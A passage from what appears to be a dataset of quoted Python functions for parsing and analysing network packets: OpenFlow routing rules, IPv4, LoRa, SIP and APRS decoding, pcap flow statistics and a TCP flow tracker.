str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def _decode_frame(self):\n\n self._processed.eth_frame.log(level=logging_helper.INFO)\n\n # Parse IP packets, protocol=0x8\n if hex(self._processed.eth_frame.protocol) == u'0x8':\n self._processed.ip_frame = IPFrame(self._processed.eth_frame.payload)\n self._processed.ip_frame.log(level=logging_helper.INFO)\n\n if self._processed.ip_frame.payload is not None:\n self._processed.ip_frame.payload.log(level=logging_helper.INFO)\n\n else:\n logging.info(u'Not an IP payload')\n\n logging.info(self._processed)", "def _decode(self):\n \n self.version = int(data_to_hex_str(self.packet[0])[2])\n self.header_len = int(data_to_hex_str(self.packet[0])[3]) * 4\n self.type_of_service = data_to_hex_str(self.packet[1:2])\n self.total_len = int(data_to_hex_str(self.packet[2:4]), 16)\n self.id = data_to_hex_str(self.packet[4:6])\n \n #parse the flags fields(reservedbit, don't fragment, more fragment)\n if ((ord(self.packet[6]) & (1 << 7)) != 0):\n self.flags_reservedbit = 1\n else:\n self.flags_reservedbit = 0\n #endof if\n \n if ((ord(self.packet[6]) & (1 << 6)) != 0):\n self.flags_dont_fragment = 1\n else:\n self.flags_dont_fragment = 0\n #endof if\n \n if ((ord(self.packet[6]) & (1 << 5)) != 0):\n self.flags_more_fragment = 1\n else:\n self.flags_more_fragment = 0\n #endof if\n \n #parse the offset field(in packet[6:7]): 00011111 & packet[6] (to filter flags) -->> get packet[6:7] in hex_str\n #tmp = str(31 & ord(self.packet[6]))\n self.fragment_offset = int(data_to_hex_str(self.packet[6:8]), 16)\n if (self.fragment_offset >= (1 << 13)):\n #take away the flags fields: 00011111 11111111 & self.fragment_offset\n self.fragment_offset = self.fragment_offset & ((1 << 13) - 1) \n \n self.TTL = ord(self.packet[8])\n self.protocol = IPPROTO[ord(self.packet[9])]\n self.header_checksum = data_to_hex_str(self.packet[10:12])\n \n self.src = str(ord(self.packet[12])) + '.' + str(ord(self.packet[13])) + '.' + \\\n str(ord(self.packet[14])) + '.' + str(ord(self.packet[15]))\n self.dst = str(ord(self.packet[16])) + '.' + str(ord(self.packet[17])) + '.' + \\\n str(ord(self.packet[18])) + '.' + str(ord(self.packet[19]))\n \n if (self.header_len > 20):\n self.opt_paddings = self.packet[20 : (self.header_len)]", "def process(self, pkt):\n pass", "def parse_frame(data):\n test = binascii.hexlify(data)\n # defines the format of received LoRa frame header\n tap_header_format = 'bbhiibbbbib'\n phy_header_format = 'bbb'\n header_format = tap_header_format + phy_header_format\n print header_format\n header_len = struct.calcsize(header_format)\n data_len = len(data)\n if header_len > data_len:\n print 'packet too short'\n return (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,)\n else:\n # defines the frame format based on header and length of frame\n data_format = header_format + str(data_len - header_len) + 's'\n print data_format\n # print \"tap header: \", header_len\n # print \"data length: \", data_len\n # print \"test length: \", len(test)\n\n unpacked = struct.unpack(data_format, data)\n print unpacked\n # print '-----------------------------------------------------'\n # print \"bin \" + data\n # print 'hex ' + test\n return unpacked", "def print_packets(pcap):\n\n # For each packet in the pcap process the contents\n for timestamp, buf, hdr_len in pcap:\n \n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n\n # Make sure the Ethernet data contains an IP packet\n if not isinstance(eth.data, dpkt.ip.IP):\n # print('Non IP Packet type not supported %s\\n' % eth.data.__class__.__name__)\n continue\n\n # Now unpack the data within the Ethernet frame (the IP packet)\n # Pulling out src, dst, length, fragment info, TTL, and Protocol\n ip = eth.data\n\n # Pull out fragment information (flags and offset all packed into off field, so use bitmasks)\n # do_not_fragment = bool(ip.off & dpkt.ip.IP_DF)\n # more_fragments = bool(ip.off & dpkt.ip.IP_MF)\n # fragment_offset = ip.off & dpkt.ip.IP_OFFMASK\n\n # Print out the info\n # print('IP: %s -> %s (len=%d ttl=%d DF=%d MF=%d offset=%d)\\n' % \\\n # (inet_to_str(ip.src), inet_to_str(ip.dst), ip.len, ip.ttl, do_not_fragment, more_fragments, fragment_offset)) \n\n pkt = Packet(timestamp, buf, hdr_len)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP or ip.p == dpkt.ip.IP_PROTO_UDP: \n # all flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in all_flows:\n all_flows[flow] = [pkt]\n else:\n x = len(all_flows[flow]) - 1\n if x < 0:\n all_flows[flow].append(pkt)\n else:\n if time_diff(all_flows[flow][x].timestamp, timestamp) <= 5400: #90mins\n all_flows[flow].append(pkt)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP: \n # TCP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in tcp_flows:\n tcp_flows[flow] = [pkt]\n else:\n x = len(tcp_flows[flow]) - 1\n if x < 0:\n tcp_flows[flow].append(pkt)\n else:\n if time_diff(tcp_flows[flow][x].timestamp, timestamp) <= 5400:\n tcp_flows[flow].append(pkt)\n all_host_pairs(pkt, ip)\n elif ip.p == dpkt.ip.IP_PROTO_UDP:\n # UDP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in udp_flows:\n udp_flows[flow] = [pkt]\n else:\n x = len(udp_flows[flow]) - 1\n if x < 0:\n udp_flows[flow].append(pkt)\n else:\n if time_diff(udp_flows[flow][x].timestamp, timestamp) <= 5400:\n udp_flows[flow].append(pkt)\n else:\n continue\n\n print(\"Number of All flows: %d | Number of TCP flows: %d | Number of UDP flows: %d\" % (len(all_flows), len(tcp_flows), len(udp_flows)))\n\n # -- Flow Duration\n for f in all_flows:\n size = len(all_flows[f])\n if size >= 2:\n all_flow_dur.append(time_diff(all_flows[f][0].timestamp, all_flows[f][size-1].timestamp))\n \n for f in tcp_flows:\n size = len(tcp_flows[f])\n if size >= 2:\n tcp_flow_dur.append(time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp))\n \n for f in udp_flows:\n size = len(udp_flows[f])\n if size >= 2:\n udp_flow_dur.append(time_diff(udp_flows[f][0].timestamp, udp_flows[f][size-1].timestamp))\n\n print \"lens: \", len(all_flow_dur), len(tcp_flow_dur), len(udp_flow_dur)\n\n # -- Flow Size\n for f in all_flows:\n f_bytes = 0\n size = len(all_flows[f])\n all_flow_size_pkt.append(size)\n for p in all_flows[f]:\n f_bytes += p.length\n all_flow_size_byte.append(f_bytes)\n \n for f in tcp_flows:\n f_bytes = 0\n f_overhead = 0\n size = len(tcp_flows[f])\n tcp_flow_size_pkt.append(size)\n for p in tcp_flows[f]:\n f_bytes += p.length\n f_overhead += 18 + 20 #+ tcp_hdr\n tcp_flow_size_byte.append(f_bytes)\n if f_bytes == 0:\n f_bytes = 9999\n tcp_flow_size_overhead.append(f_overhead/float(f_bytes))\n \n for f in udp_flows:\n f_bytes = 0\n size = len(udp_flows[f])\n udp_flow_size_pkt.append(size)\n for p in udp_flows[f]:\n f_bytes += p.length\n udp_flow_size_byte.append(f_bytes)\n\n # -- Inter-packet Arrival time\n for f in all_flows:\n for i in range(len(all_flows[f])-1):\n all_flow_time.append(time_diff(all_flows[f][i].timestamp, all_flows[f][i+1].timestamp))\n\n for f in tcp_flows:\n for i in range(len(tcp_flows[f])-1):\n tcp_flow_time.append(time_diff(tcp_flows[f][i].timestamp, tcp_flows[f][i+1].timestamp))\n\n for f in udp_flows:\n for i in range(len(udp_flows[f])-1):\n udp_flow_time.append(time_diff(udp_flows[f][i].timestamp, udp_flows[f][i+1].timestamp))\n\n # -- TCP State\n for f in tcp_flows:\n size = len(tcp_flows[f])\n last_pkt = tcp_flows[f][size-1]\n tcp = dpkt.ethernet.Ethernet(last_pkt.buf).data.data\n \n if (tcp.flags & dpkt.tcp.TH_SYN) != 0:\n f.state = 'Request'\n elif (tcp.flags & dpkt.tcp.TH_RST) != 0:\n f.state = 'Reset'\n elif (tcp.flags & dpkt.tcp.TH_FIN) != 0 and (tcp.flags & dpkt.tcp.TH_ACK) != 0:\n f.state = 'Finished'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) <= 300:\n f.state = 'Ongoing'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) > 300 \\\n and (tcp.flags & dpkt.tcp.TH_RST) == 0 and (tcp.flags & dpkt.tcp.TH_FIN) == 0:\n f.state = 'Failed'\n\n show_cdf_graphs()", "def packetReceived(self, packet):\n for layer in packet:\n if (layer.layer_name == 'fmtp' and\n int(layer.type) == 1):\n # Data is stored as a hexadecimal string in the XML file\n # generated by tshark\n data = binascii.unhexlify(layer.data)\n log.msg(\"FMTP message received: {}\".format(data))", "def pull(self):\n\n # For each packet in the pcap process the contents\n for item in self.input_stream:\n\n # Print out the timestamp in UTC\n print('%s -' % item['timestamp'], end='')\n\n # Transport info\n if item['transport']:\n print(item['transport']['type'], end='')\n\n # Print out the Packet info\n packet_type = item['packet']['type']\n print(packet_type, end='')\n packet = item['packet']\n if packet_type in ['IP', 'IP6']:\n # Is there domain info?\n if 'src_domain' in packet:\n print('%s(%s) --> %s(%s)' % (net_utils.inet_to_str(packet['src']), packet['src_domain'],\n net_utils.inet_to_str(packet['dst']), packet['dst_domain']), end='')\n else:\n print('%s --> %s' % (net_utils.inet_to_str(packet['src']), net_utils.inet_to_str(packet['dst'])), end='')\n else:\n print(str(packet))\n\n # Only include application if we have it\n if item['application']:\n print('Application: %s' % item['application']['type'], end='')\n print(str(item['application']), end='')\n\n # Just for newline\n print()", "def parse_pkt_list(self, pkt_list):\n flow_pkts = {}\n for (t, pkt) in pkt_list:\n flowID = self.extract_flowID(pkt)\n if flowID not in flow_pkts.keys():\n flow_pkts[flowID] = [(t, pkt)]\n else:\n flow_pkts[flowID].append((t,pkt))\n return flow_pkts", "def _parse_head(line):\n retval = {}\n m = re.match(\n '[0-9]+: (?P<if>\\w+\\d{1,3}): <(?P<flags>[^>]+)> mtu (?P<mtu>[0-9]+)',\n line\n )\n if m:\n retval['ifname'] = m.group('if')\n retval['mtu'] = int(m.group('mtu'))\n retval['flags'] = m.group('flags').split(',')\n return retval", "def _icmp_parse_payload(pkt):\n\n payload = ''\n icmp_pkt = pkt.get_protocol(icmp.icmp)\n for char in icmp_pkt.data.data:\n payload+=(chr(char))\n parsed_payload = ast.literal_eval(payload.rstrip('\\0'))\n return(parsed_payload)", "def fromstring(cls, str_pkt):\n xml_pkt = lxml.objectify.fromstring(str_pkt)\n layers = [Layer(proto) for proto in xml_pkt.proto]\n geninfo, frame, layers = layers[0], layers[1], layers[2:]\n frame.raw_mode = True\n return cls(layers=layers,\n length=int(geninfo.get_field_value('len')),\n captured_length=int(geninfo.get_field_value('caplen')),\n sniff_time=geninfo.get_field_value('timestamp', raw=True),\n interface_captured=frame.get_field_value('interface_id'))", "def read_packet(self):\n\n\t\t#self.debug(\"READ BUFFER SIZE: %d\" % len(self.buff))\n\t\tbackup = self.buff[:]\n\t\tpacket = Packet()\n\t\ttry:\n\t\t\tpacket.direction = self.node\n\t\t\tpacket.ident = self.unpack('ubyte')\n\t\t\t\n\t\t\t#Defined structs from huge dict\n\t\t\tfor datatype, name in self.get_struct(packet):\n\t\t\t\t# this populates packet.data with {name: value}\n\t\t\t\tpacket.data[name] = self.unpack(datatype)\n\n\t\t\t# I believe the following are packet-type specific fixes for variable-length packets.\n\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tpacket.data['x2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['y2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['z2'] = self.unpack('short')\n\t\t\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data'] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = self.unpack_array_fast('short', packet.data['data_size'])\n#\t\t\t\tbtype = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tmetadata = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tpacket.data[\"blocks\"] = []\n#\t\t\t\tfor i in zip(coords, btype, metadata):\n#\t\t\t\t\tblock = {}\n#\t\t\t\t\tblock[\"x\"] =\t\ti[0] >> 12\n#\t\t\t\t\tblock[\"z\"] = 0x0F & i[0] >> 8\n#\t\t\t\t\tblock[\"y\"] = 0xFF & i[0]\n#\t\t\t\t\tblock[\"type\"] = i[1]\n#\t\t\t\t\tblock[\"metadata\"] = i[2]\n#\t\t\t\t\tpacket.data[\"blocks\"].append(block)\n#\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\trecords = self.unpack_array_fast('byte', packet.data['data_size']*3)\n\t\t\t\ti = 0\n\t\t\t\tpacket.data[\"blocks\"] = []\n\t\t\t\twhile i < packet.data['data_size']*3:\n\t\t\t\t\tpacket.data[\"blocks\"].append(dict(zip(('x','y','z'), records[i:i+3])))\n\t\t\t\t\ti+=3\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data[\"slots_data\"] = self.unpack_array('slot', packet.data[\"data_size\"])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\t#0x82:\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tpacket.data[\"text\"] = []\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"text\"].append(packet.data[\"line_%s\" % (i+1)])\n\t\t\t\t\t\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data[\"data\"] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\n\t\t\t# Sets packet.original to the byte string that the packet was decoded from.\n\t\t\tpacket.original = backup[:len(backup) - len(self.buff)]\n\n\t\t\treturn packet\n\n\t\texcept IncompleteData:\n\t\t\tself.buff = backup\n\t\t\treturn None\n\t\texcept Exception, ex:\n\t\t\tself.buff = backup\n\t\t\tex.args += (self.buff[20:],)\n\t\t\traise", "def ReceiveMessageFromPacketInfo(self) -> IPPacketInformation:", "def parse_packet(self, data):\n return data.decode().split('\\x00')", "def process(self, packet):\n pass", "def tcp_pkt_debug_info(pkt: dpkt.ip.IP) -> str:\n if isinstance(pkt, dpkt.ip.IP):\n paylod_len = pkt.len - (4 * pkt.hl) - (4 * pkt.data.off)\n return \"{}:{}-> {}:{}, seq: {}, ack:{}, flag:{}, payload len: {}, payload: {}, sum: {}\".format(\n inet_to_str(pkt.src), pkt.data.sport, inet_to_str(pkt.dst), pkt.data.dport, hex(pkt.data.seq),\n hex(pkt.data.ack), hex(pkt.data.flags), hex(paylod_len), pkt.data.data, hex(pkt.data.sum))", "def _parse_data(data: str) -> Tuple[str, str, str, int, int, int, str]:\n\n phg = None\n rng = None\n dfs = None\n course = None\n speed = None\n altitude = None\n comment = None\n\n if re.match(r'^PHG[0-9]{4}', data[:7]):\n # Packet has a PHG (power, antenna height/gain/directivity) value\n phg = data[3:7]\n logger.debug(\"PHG is {}\".format(phg))\n data = data[7:]\n\n elif re.match('^RNG[0-9]{4}', data[:7]):\n # Packet has an RNG (radio range) value\n rng = data[3:7]\n logger.debug(\"RNG is {}\".format(rng))\n data = data[7:]\n\n elif re.match('^DFS[0-9]{4}', data[:7]):\n # Packet has a DFS (DF signal strength, antenna height/gain/directivity) value\n dfs = data[3:7]\n logger.debug(\"DFS is {}\".format(dfs))\n data = data[7:]\n\n elif re.match('^[0-9]{3}/[0-9]{3}', data[:7]):\n # Packet has course and speed values\n course = int(data[:3])\n speed = int(data[4:7])\n logger.debug(\"Course is {}, speed is {}\".format(course, speed))\n data = data[7:]\n\n # TODO - parse BRG/NRQ\n\n # Check for comment\n if len(data) > 0:\n\n # Check for altitude\n # As per APRS 1.01 C6 P26, altitude as /A=nnnnnn may appear anywhere in the comment\n has_altitude = re.match('.*/A=([0-9]{6}).*', data)\n if has_altitude:\n # TODO - fix altitude format\n altitude = int(has_altitude.groups()[0])\n logger.debug(\"Altitude is {} ft\".format(altitude))\n\n # Strip out the altitude from the comment\n data = re.sub(r'/A=[0-9]{6}', \"\", data)\n\n # Set the comment as the remainder of the information field\n comment = data\n logger.debug(\"Comment is {}\".format(comment))\n\n return (phg, rng, dfs, course, speed, altitude, comment)", "def parsePkt(pkt):\r\n meta = dict()\r\n headers = dict()\r\n for h,pattern in SIP_PKT_PATTERNS.iteritems():\r\n if h in ['reqfirstline', 'respfirstline']:\r\n continue\r\n headers[h] = None\r\n match = pattern.search(pkt)\r\n if match:\r\n headers[h] = re.sub(h + ': ', '', match.group()).rstrip('\\r\\n')\r\n if h == 'User-Agent' and headers[h]:\r\n headers[h] = re.sub(\"Server: \", \"\", headers[h])\r\n match_1 = SIP_PKT_PATTERNS['respfirstline'].search(pkt)\r\n match_2 = SIP_PKT_PATTERNS['reqfirstline'].search(pkt)\r\n if match_1:\r\n meta['respfirstline'] = match_1.group().rstrip(' \\r\\n')\r\n meta['code'] = int(match_1.group('code'))\r\n elif match_2:\r\n meta['reqfirstline'] = match_2.group().rstrip(' \\r\\n')\r\n meta['code'] = None\r\n else:\r\n print \"can't parse rotten SIP pkt:\\r\\n%s\" %(pkt)\r\n return \r\n if meta['code'] == AUTHREQ \\\r\n or meta['code'] == PROXYAUTHREQ:\r\n meta['auth-header'] = dict()\r\n auth_match = re.search('(?P<www_or_proxy>(?:WWW|Proxy)-Authenticate): Digest (?P<other_meta>.*)\\r\\n', pkt)\r\n if auth_match:\r\n meta['auth-header']['type'] = auth_match.group('www_or_proxy')\r\n if meta['auth-header']['type'] == 'WWW-Auth-Header':\r\n meta['auth-header']['domain'] = re.search('domain=\"([-\\/\\\\:\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n meta['auth-header']['qop'] = re.search('qop=\"([-\\/\\\\:\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n meta['auth-header']['stale'] = re.search('stale=(?:True|False)', other_meta).group(1)\r\n meta['auth-header']['opaque'] = re.search('opaque=\"([-\\/\\\\:\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n other_meta = auth_match.group('other_meta')\r\n algo_match = re.search('algorithm=([a-zA-Z0-9]+)', other_meta)\r\n meta['auth-header']['realm'] = re.search('realm=\"([-\\/\\\\:_\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n meta['auth-header']['nonce'] = re.search('nonce=\"([-\\/\\\\+:_\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n if algo_match:\r\n meta['auth-header']['algorithm'] = algo_match.group(1)\r\n else:\r\n meta['auth-header']['algorithm'] = 'MD5' \r\n else:\r\n del meta['auth-header']\r\n meta['headers'] = headers\r\n return meta", "def callback(self, pkt):\n if ARP in pkt:\n self.parse_ip(pkt.sprintf(\"%ARP.psrc%\"))\n if TCP in pkt or UDP in pkt:\n self.parse_ip(pkt.sprintf(\"%IP.src%\"))\n self.parse_ip(pkt.sprintf(\"%IP.dst%\"))", "def parse_pkt_list(self, log_pkt_list):\n flow_pkts = {}\n for pkt in log_pkt_list:\n flowID = pkt.flowID\n if flowID not in flow_pkts.keys():\n flow_pkts[flowID] = [(pkt.time, pkt)]\n else:\n flow_pkts[flowID].append((pkt.time, pkt))\n return flow_pkts", "def read_raw_packet(self):\n\n size = 0\n\n # Read our two-byte header from the debugger...\n while not size:\n size = (self._get_next_byte() << 16) | self._get_next_byte()\n\n # ... and read our packet.\n packet = bytearray([self._get_next_byte() for _ in range(size)])\n\n # Return our packet.\n # TODO: extract and provide status flags\n # TODO: generate a timestamp on-device\n return packet, datetime.now(), None", "def unpack(self, pkt):\n if pkt[0]!='$' or pkt[-3]!='#':\n raise ValueError('bad packet')\n if (sum(ord(c) for c in pkt[1:-3]) % 256) != int(pkt[-2:],16):\n raise ValueError('bad checksum')\n pkt = pkt[1:-3]\n return pkt", "def interpret_packet_value_pair(data):\n if data is None:\n return None, None\n packet_type = int.from_bytes(data[3:4], 'little')\n name = value = None\n if packet_type == 1:\n name = str(data[17:], 'utf8') \n value = float(ustruct.unpack('<i', data[12:16])[0])\n elif packet_type == 5:\n name = str(data[21:29], 'ascii').strip()\n value = ustruct.unpack('<d', data[12:20])[0]\n else:\n display.scroll('Packet type {} not recognised'.format(packet_type))\n return name, value", "def extract_trpt_data(udp_packet):\n logger.debug('UDP packet sport [%s], dport [%s], len [%s]',\n udp_packet.sport, udp_packet.dport, udp_packet.len)\n\n trpt_pkt = TelemetryReport(_pkt=udp_packet.payload)\n trpt_eth = EthInt(trpt_pkt.payload)\n logger.debug('TRPT ethernet dst - [%s], src - [%s], type - [%s]',\n trpt_eth.dst, trpt_eth.src, trpt_eth.type)\n return extract_int_data(trpt_eth)", "def ethernet_frame(packet):\n dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', packet[:14])\n return get_mac_addr(dest_mac), get_mac_addr(src_mac), socket.htons(proto), packet[14:]", "def parse(self):\n i = 1\n times = []\n while 1:\n byte = yield\n if byte== 0xaa:\n byte = yield # This byte should be \"\\aa\" too\n if byte== 0xaa:\n # packet synced by 0xaa 0xaa\n packet_length = yield\n packet_code = yield\n if packet_code == 0xd4:\n # standing by\n self.state = \"standby\"\n elif packet_code == 0xd0:\n self.state = \"connected\"\n elif packet_code == 0xd2:\n data_len = yield\n headset_id = yield\n headset_id += yield\n self.dongle_state = \"disconnected\"\n else:\n self.sending_data = True\n left = packet_length - 2\n while left>0:\n if packet_code ==0x80: # raw value\n row_length = yield\n a = yield\n b = yield\n value = struct.unpack(\"<h\",chr(b)+chr(a))[0]\n self.dispatch_data(\"raw\", value)\n left -= 2\n elif packet_code == 0x02: # Poor signal\n a = yield\n\n left -= 1\n elif packet_code == 0x04: # Attention (eSense)\n a = yield\n if a>0:\n v = struct.unpack(\"b\",chr(a))[0]\n if 0 < v <= 100:\n self.dispatch_data(\"attention\", v)\n left-=1\n elif packet_code == 0x05: # Meditation (eSense)\n a = yield\n if a>0:\n v = struct.unpack(\"b\",chr(a))[0]\n if 0 < v <= 100:\n self.dispatch_data(\"meditation\", v)\n left-=1\n elif packet_code == 0x16: # Blink Strength\n self.current_blink_strength = yield\n \n left-=1\n elif packet_code == 0x83:\n vlength = yield\n self.current_vector = []\n for row in range(8):\n a = yield\n b = yield\n c = yield\n value = a*255*255+b*255+c\n left -= vlength\n self.dispatch_data(\"bands\", self.current_vector)\n packet_code = yield\n else:\n pass # sync failed\n else:\n pass # sync failed", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def setPacket(self, packet):\n\t\tself.clear()\n\t\tself.packet = packet\n\t\t\n\t\tfields = self.fields\n\t\t\n\t\tfields.append(['Reception time', '%s:%s:%s.%s' % tuple(packet.time), None])\n\t\t\n\t\tif self.packet.isInvalid:\n\t\t\treturn\n\t\t\n\t\tfields.append(['Transmission info', 'CRC passed: %s, LQI: %s, RSSI: %s' % (packet.CRCOk, packet.LQI, packet.RSSI), None])\n\t\tfields.append(['PHY fields', '', None])\n\t\tphy = len(fields) - 1\n\t\tfields.append(['Frame length', len(packet.load), phy])\n\t\t\n\t\tfields.append(['MAC fields', '', None])\n\t\tmac = len(fields) - 1\n\t\tfields.append(['Frame control', packet.frameControl, mac])\n\t\tfields.append(['Frame Type', packet.frameType, 